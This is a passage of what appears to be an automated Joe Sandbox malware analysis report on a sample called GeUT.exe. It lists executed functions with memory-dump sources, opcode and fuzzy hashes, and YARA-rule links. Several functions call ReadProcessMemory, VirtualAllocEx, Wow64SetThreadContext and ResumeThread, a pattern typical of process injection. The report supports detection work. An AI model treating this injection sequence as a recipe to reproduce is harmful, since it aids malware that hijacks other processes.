Opcode ID: 14355e922fb7ada4d126933d69ab15fa15fa626517edf104e40d6635d2062f4d
Instruction ID: f831381d4f0f0a59de23f304b561fc1d358b6d20782bfeabe5d74edbd60655a9
Opcode Fuzzy Hash: 14355e922fb7ada4d126933d69ab15fa15fa626517edf104e40d6635d2062f4d
Instruction Fuzzy Hash: B14167B5D042589FCB00CFA9D984ADEFBF1BB49314F24902AE818B7211D375AA45CB64

Function 02731FD0 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02732085

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6f47055cd694273b724005ab142515bae52289b06f1d86c5db667de8458bf242
Instruction ID: ce19242c2dee0ec9f9912422ae6baf01a72c1505fc885f0cf6e0be7de038656e
Opcode Fuzzy Hash: 6f47055cd694273b724005ab142515bae52289b06f1d86c5db667de8458bf242
Instruction Fuzzy Hash: DF4199B9D04258DFCF10CFAAD980ADEFBB1BB19310F10A02AE818B7211D375A945CF65

Function 027320E8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02732195

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7527af1426b6af317fbace3b98307698ca814b657cb05564601fe9f7169f9bcb
Instruction ID: 37000e490ac31997a2f4749ac50fafa68c2c2504615f6f0f4e563720ac13e189
Opcode Fuzzy Hash: 7527af1426b6af317fbace3b98307698ca814b657cb05564601fe9f7169f9bcb
Instruction Fuzzy Hash: F73176B9D002589FCF10CFA9D980A9EFBB5BB09310F10A02AE914B7311D335A905CFA5

Function 02731FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02732085

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 54dc1e6b52ac2f4561cc01a3f4958b0d184a919456f0e774ebbe180cad0ebd4a
Instruction ID: c5a5f731f52a5fd82780ed003d750c90adc58d666347f5907377efac0d93bd07
Opcode Fuzzy Hash: 54dc1e6b52ac2f4561cc01a3f4958b0d184a919456f0e774ebbe180cad0ebd4a
Instruction Fuzzy Hash: 583187B9D04258DFCF10CFAAD984ADEFBB1BB09310F10A02AE818B7210D375A945CF65

Function 027320F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02732195

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7cb38bc4b12f95b415309750c084fd5aa4052c2ee4d9ccd0d40fd22641d76a38
Instruction ID: e33ce4913d5da77e13895a48a21e52728c798786299affd00749e64ab2add4fc
Opcode Fuzzy Hash: 7cb38bc4b12f95b415309750c084fd5aa4052c2ee4d9ccd0d40fd22641d76a38
Instruction Fuzzy Hash: 603154B9D04258DFCF10CFA9D984A9EFBB5BB09310F10A02AE918B7310D375A945CFA5

Function 02731EC1 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02731F72

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 62af085bc5380cac3eb64e59cefe9e2ad37a70b2f79f84706d8a9747e10d543b
Instruction ID: 25909ecbff8f5111f123457fbd37c022edf1a9de824e795c5d20009fb92078de
Opcode Fuzzy Hash: 62af085bc5380cac3eb64e59cefe9e2ad37a70b2f79f84706d8a9747e10d543b
Instruction Fuzzy Hash: C431CAB5D012599FCB10CFA9D984ADEFBF1BF49314F24902AE418B7250C378AA45CF94

Function 02731EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02731F72

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b4a79fa42a0c4b56098d44fc4b8f885b4a73ff938299a9df4b208916f71095d0
Instruction ID: 1c80e6ffe41526c6e17f4b913ef033916028470eda4e615c53eb5edc41a96ed0
Opcode Fuzzy Hash: b4a79fa42a0c4b56098d44fc4b8f885b4a73ff938299a9df4b208916f71095d0
Instruction Fuzzy Hash: B8319BB5D012599FCB10CFAAD584ADEFBF1BB49314F24902AE418B7310D378AA45CF64

Function 02732331 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 027323AE

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 94aaf37986ba96f5fc5d6dbc431918f5be7b99d122ea8e22e230ad33f3fade97
Instruction ID: 6ef263cf11dbbc35c1ece0a7fa26cca61276b95631988feb266f56d03692327b
Opcode Fuzzy Hash: 94aaf37986ba96f5fc5d6dbc431918f5be7b99d122ea8e22e230ad33f3fade97
Instruction Fuzzy Hash: DA21CCB9D042189FCB10CFA9D480ADEFBF4BB49310F20901AE918B7311D375A945CFA4

Function 02732338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 027323AE

Memory Dump Source

Source File: 00000011.00000002.2420760112.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2730000_GeUT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 565a4cd31955049e0f3f0f9791269794d77851324f3d858a7d990715213d5801
Instruction ID: 5f4ad91e776158ffb66b0623380783b06ee69a017905e68adf9418854144d0b6
Opcode Fuzzy Hash: 565a4cd31955049e0f3f0f9791269794d77851324f3d858a7d990715213d5801
Instruction Fuzzy Hash: 3721B7B9D042189FCB10CFA9D584ADEFBF4BB09320F20906AE818B7311D375A945CFA5

Function 00A8D5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2419319140.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a8d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9f947f71cf259170b82dc155c508fbf108c4b67092fba570aa9e6b6d46aef5a
Instruction ID: a2913d0f5c7a3b8d61b4eb6007d0ceec4cd1663a96ec984a2107499e6177d1a0
Opcode Fuzzy Hash: f9f947f71cf259170b82dc155c508fbf108c4b67092fba570aa9e6b6d46aef5a
Instruction Fuzzy Hash: CB2125B2504208EFDB05EF14D9C0F26BF66FB94324F24857DE9090B296D336D856CBA1

Function 00A8D5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2419319140.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_a8d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: c5558979674f1d77ed2378497ee03d125e2287d336085ec7b9ab4932c5c90395
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 3B11E676504284DFCF15DF10D5C4B16BF72FB94314F24C6A9D8090B256C33AD856CBA1

Analysis Process: GeUT.exePID: 6552, Parent PID: 1320COMMON

Executed Functions

Function 02FF0D95 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15f60482a1ddedc2fa356c1d8ea87f7f24552b3e483c2b5c9521a4df72c86759
Instruction ID: b7affa5de6c35133f1502543c0533e79fe0f22eaa1ad625014e82dd7a46dc7e3
Opcode Fuzzy Hash: 15f60482a1ddedc2fa356c1d8ea87f7f24552b3e483c2b5c9521a4df72c86759
Instruction Fuzzy Hash: B6516D70A002498FDB49EB79E85896EBFB2FF843407004A2CD556CB2A1EF789D55DF81

Function 02FF1010 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be92d87329ef0386eb0a728126b3deeaadc05e3867dfda72163d410cc0f2a773
Instruction ID: dc58f1869467482a099e1e86d37daaf8eeb73f13995915c5779cf57892abd1c4
Opcode Fuzzy Hash: be92d87329ef0386eb0a728126b3deeaadc05e3867dfda72163d410cc0f2a773
Instruction Fuzzy Hash: B9915C70B002498FDB45AB79D858A6EBFB2FF89340B10496CD516DB3A1EF749C05CB81

Function 02FF1157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefc072f1a457d1fda9942001ecc84ad1ba4d59e048fe9db31612bd9a557ec5a
Instruction ID: 1101d75945ba70dedab7a439ec489caf5122a3a80135a431560d0e3c868622e2
Opcode Fuzzy Hash: eefc072f1a457d1fda9942001ecc84ad1ba4d59e048fe9db31612bd9a557ec5a
Instruction Fuzzy Hash: C6318971B00B458BEB55BB79882852EBAE2BFC42903108D3DC25BCB794EF749C048F81

Function 02FF1860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01b90d4798bc8e4cb5c01504f216be0c5a6959c9250f25cb256a8b221e92e16
Instruction ID: 52b03a8f53a89bcf27c3a0911545ef155ec8eda053e921b89e81ce04ab7a826f
Opcode Fuzzy Hash: b01b90d4798bc8e4cb5c01504f216be0c5a6959c9250f25cb256a8b221e92e16
Instruction Fuzzy Hash: 89215171F002059BEB54ABF9881936FBAEBEFC8750F14842DD64AD7355DD748C014BA1

Function 02FF174B Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8ae4cb44e29ae7d91fb6c3ee49aa0d893457dbd9e6d889188b7c8c50f1e2b8
Instruction ID: abb3dcabb689dae0ad4c53624bd32b72e5905b3d26554719e9841986d83fbd26
Opcode Fuzzy Hash: ea8ae4cb44e29ae7d91fb6c3ee49aa0d893457dbd9e6d889188b7c8c50f1e2b8
Instruction Fuzzy Hash: E9215E70E0020ADFDB04EBB9D990A6DBFB2FF88300F104569D615A7351EB746A81CF51

Function 02FF1750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b61d66d2d47be0c5d43a78e71a03fc64a49d41479dbd846c80d5a37e6682a91e
Instruction ID: fc7e71eb809ef41c96a0a261212c7fb787a6b6db41537b3f14d05849bc9e1fd8
Opcode Fuzzy Hash: b61d66d2d47be0c5d43a78e71a03fc64a49d41479dbd846c80d5a37e6682a91e
Instruction Fuzzy Hash: 11215C70E0020ADFDB04EBB9D880AADBBB2FF88300F104569D615A7351EB746A81CF51

Function 02FF0939 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c755912c6e0fe73d346c372c7360a99378f36a6bac2743a53655324cd1611a
Instruction ID: 1c07e099ad1af26cd0f926987f2dac14be47e7048a672ecd8e02d5faa2fafe27
Opcode Fuzzy Hash: b7c755912c6e0fe73d346c372c7360a99378f36a6bac2743a53655324cd1611a
Instruction Fuzzy Hash: B021BB30E052489FDB55EBB8C8517AEBFB2EF84340F1480ADC649EB296DB304D06CB81

Function 02FF0828 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a844b627e42fd32cfd9cc7b05082acb3e9685af400305ebcacd8518c719491c
Instruction ID: 496fdabc7609885cc159bbb441ee313c5f64878cf6b8e50ed0743fc7fc9b9a71
Opcode Fuzzy Hash: 0a844b627e42fd32cfd9cc7b05082acb3e9685af400305ebcacd8518c719491c
Instruction Fuzzy Hash: BE214C3010524ACFDB06DB2AFE90A553F71FB85304B00A69DD5549B262DABC6D8BDF81

Function 02FF0848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2448593746.0000000002FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2ff0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff577031ef9614ccc0ab38f2f839a64847806284f0c1777b07e780445fced6ec
Instruction ID: 9dd835f286a802bdbc1c06e831d08a7e0eddf808e7e08570ae10b3b227265f7c
Opcode Fuzzy Hash: ff577031ef9614ccc0ab38f2f839a64847806284f0c1777b07e780445fced6ec
Instruction Fuzzy Hash: 4B11B97050020BCFDB09DF2AFA80A557FB5F788304B10A69C95149B215DABC6E8BDF81

Analysis Process: GeUT.exePID: 2404, Parent PID: 1320COMMON

Executed Functions

Function 01750D95 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d9517e3b905e49dfed59f4b83e031dc8883a2d8881f038b0a75b98c5137c3d
Instruction ID: 0b56ceeeb1f92ff07d3df7da274581245af64a7a582df756b7ff69f76ce6cf8b
Opcode Fuzzy Hash: 91d9517e3b905e49dfed59f4b83e031dc8883a2d8881f038b0a75b98c5137c3d
Instruction Fuzzy Hash: 9E518E70A00246CFDB58EB79E89852E7FA6FBC5300B005A3DD6179B295EF789C458B81

Function 01751010 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59992d2c85ea2d21f9e3cec87db25500f709dd5182bb1de27df8a4c302f7467e
Instruction ID: 84fba2dd6479c8501b7f4def276e1894079fcceaacf3a17c08f340a241ac6d67
Opcode Fuzzy Hash: 59992d2c85ea2d21f9e3cec87db25500f709dd5182bb1de27df8a4c302f7467e
Instruction Fuzzy Hash: E8918E30B00246CFDB54EB79D858A2E7FA6FBC5300B105969E516DB3A5EF749C058B81

Function 01751157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66fece5e944ce60c11808e91bd91dd5dada06698eea0830fc7cf68bed6a2742d
Instruction ID: bf490304c939d095f34ab9c135daa7d340f35778f35339784c6df9129e2d557c
Opcode Fuzzy Hash: 66fece5e944ce60c11808e91bd91dd5dada06698eea0830fc7cf68bed6a2742d
Instruction Fuzzy Hash: 05318931B00B418BDBA5AB7D881852EBAE6FFC5310710893DD667CB784EFB49C048B91

Function 01751860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670b0da87280542936c0102c3650c32091458bd60b72d17a92d6a3cb20795a75
Instruction ID: 8ac570ed4b569e82d9afaacc730437c799946077c7ee6950c44b9bff4f8355b2
Opcode Fuzzy Hash: 670b0da87280542936c0102c3650c32091458bd60b72d17a92d6a3cb20795a75
Instruction Fuzzy Hash: 53216D71B002469BDB54EBFD881936FBAEAEFC8350F14842ED64AD7386DE748C0147A1

Function 01751750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b566a910672473ca1858e6dc9ba3fdffb47853c8ff6d42ab5b1589dc551ed0
Instruction ID: e0ea33d3d4f3ef4b20a02b669f28a2b7dcee61e4ed6a70499439e441c81b5cad
Opcode Fuzzy Hash: 95b566a910672473ca1858e6dc9ba3fdffb47853c8ff6d42ab5b1589dc551ed0
Instruction Fuzzy Hash: B1216B70E0020ADFDB44EBB9D9446ADBFB6FF88300F104669D515A7345EBB8AA80CB51

Function 01750939 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20562cd2b4242801e48e74292429861455a0b0a730e7ca1d70f1bec3e843a015
Instruction ID: a3f025234512ec32ee30c13479152aadb3b22c18d5caf0b7073bf26001178677
Opcode Fuzzy Hash: 20562cd2b4242801e48e74292429861455a0b0a730e7ca1d70f1bec3e843a015
Instruction Fuzzy Hash: 2321C230E05248DFDB44EBB8C85579EBBF5EF84304F1084A9D509DB286EB709D04CB91

Function 01750848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2448498628.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1750000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bfe537ecf22a88411727c1a339fca07a877bd154eff96329d43b28564965c77
Instruction ID: 8fe8db3c9c639f9bba88680c0f2f9a7eb2d882c5a83c271e92e8eaee3ddea592
Opcode Fuzzy Hash: 4bfe537ecf22a88411727c1a339fca07a877bd154eff96329d43b28564965c77
Instruction Fuzzy Hash: BF11C13050124BCFDB05EF1EFA809553BA6F788304B00A69CD5149B255DBBCED8A8F81

Analysis Process: GeUT.exePID: 3172, Parent PID: 1320COMMON

Executed Functions

Function 02C70D95 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b065e03b2b870d2488a956b0f9af619a60da332af2cef7229924983131a27e3
Instruction ID: 7c4a5bb40598863709ecb94b9d9d69610e28d487908266a9d6f4744c2fa78a97
Opcode Fuzzy Hash: 4b065e03b2b870d2488a956b0f9af619a60da332af2cef7229924983131a27e3
Instruction Fuzzy Hash: 78511975600642CFDB15BB78E86C56E7FE2FB842113409A3DD1168B3A9EF74A909CB81

Function 02C71010 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6517e67e09094cf85c433ead92d5e315bd38e60b8415fa6c465292a1ffb1543
Instruction ID: 9928c7512eca701cd26277e3b057bb58c4e6f02cddc851a988083af15ec98dfe
Opcode Fuzzy Hash: a6517e67e09094cf85c433ead92d5e315bd38e60b8415fa6c465292a1ffb1543
Instruction Fuzzy Hash: 90917F35700646CFDB15EB78E858A6E7FF2FB88201B40496DD106DB3A9EF749C098B81

Function 02C71157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3700b987f8fba8459b7244828ffe4f6ab2d2c8ff4abe724d0eab61b09e2ced26
Instruction ID: bbf2729268eb233b2181bca5e3475a87c43c2eb6e9ad2ccab831768bba077260
Opcode Fuzzy Hash: 3700b987f8fba8459b7244828ffe4f6ab2d2c8ff4abe724d0eab61b09e2ced26
Instruction Fuzzy Hash: 4A317A71B00B418BEA25AB79D81852E7AE2BFC52213108E3DC25BCB794DF749D048B92

Function 02C71740 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff69961f24afa5d1f18a4ef1e06f6dae060772fe24f232c1f270e5904d92170
Instruction ID: 7bf8f8251c720a8b014cc8f928c52ae75c540f519045774be02b39aa3c7c9ae8
Opcode Fuzzy Hash: 0ff69961f24afa5d1f18a4ef1e06f6dae060772fe24f232c1f270e5904d92170
Instruction Fuzzy Hash: FB315C75D0020ADFDB44EBB8E884AAE7FB2FF84300F108A6DD505A7354EB706A45CB51

Function 02C71860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eaae72400c1e386e0d318ba25312c125a18a3583052718741b451f28d771c08
Instruction ID: b67560873836c0fc84671ed631b3450e75c352b21f43ff3546d90c501c21f871
Opcode Fuzzy Hash: 0eaae72400c1e386e0d318ba25312c125a18a3583052718741b451f28d771c08
Instruction Fuzzy Hash: 8F215E71B002059FDB54EBFA981837EBEEAFFC8610B14842ED64AD7355DE748C0587A2

Function 02C71750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1496ff3d44b708e4f688f9eabcaa37e1c8083869120af39a9522545284b1002
Instruction ID: b997de1e24740a6a31333540a7a2e01253e8f89877796ad7ad397e7ac5de8b23
Opcode Fuzzy Hash: f1496ff3d44b708e4f688f9eabcaa37e1c8083869120af39a9522545284b1002
Instruction Fuzzy Hash: CB214C75E0020ADFDB45EBB8D894AADBFB2FF84300F108A6DD105A7355EB706A44CB51

Function 02C70939 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2719ed8d6127e3e327ad3e47d9f0984ee6410364df38c5b74fa01415ea2cab0e
Instruction ID: fc055b6b72968169afbcdb84372a851f1a1621a017a2b387279e530fa7498c9b
Opcode Fuzzy Hash: 2719ed8d6127e3e327ad3e47d9f0984ee6410364df38c5b74fa01415ea2cab0e
Instruction Fuzzy Hash: 18215830E11208CFDB58EBB8D4553AE7BE2EFC4210F1485AED509AB795EB704E05CB91

Function 02C70848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2450269952.0000000002C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2c70000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65811148832ee321ede5bc253d09cf3bd30658cfabceb595bdc6b827d966c3e
Instruction ID: 1746df4b203a725cd893ad30a117319b20c781b53b90502505413e1ff45cb9aa
Opcode Fuzzy Hash: b65811148832ee321ede5bc253d09cf3bd30658cfabceb595bdc6b827d966c3e
Instruction Fuzzy Hash: 48118937901247DFDB06FF28F980A597BB5FB84304B04AA5C91049B36DFAB47909AF90

Analysis Process: GeUT.exePID: 5968, Parent PID: 1320COMMON

Executed Functions

Function 03060D95 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2592e3d3f12dacadbc3e9c50d75aba534c253bd79de6f6b07a6dee97f0e0f345
Instruction ID: ae094dd2b42ee54ac2534d58447c305e00a1b91f3d071db335961872a7f9111e
Opcode Fuzzy Hash: 2592e3d3f12dacadbc3e9c50d75aba534c253bd79de6f6b07a6dee97f0e0f345
Instruction Fuzzy Hash: CC517C706012428FDB18FF78E96C56E7FA6FBC46113004A3CD94697269EF789C088B81

Function 03061010 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450911529.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3060000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e643d4795eca22c6ecf705c8129193cc6ce84075686816cf3e728711d095112e
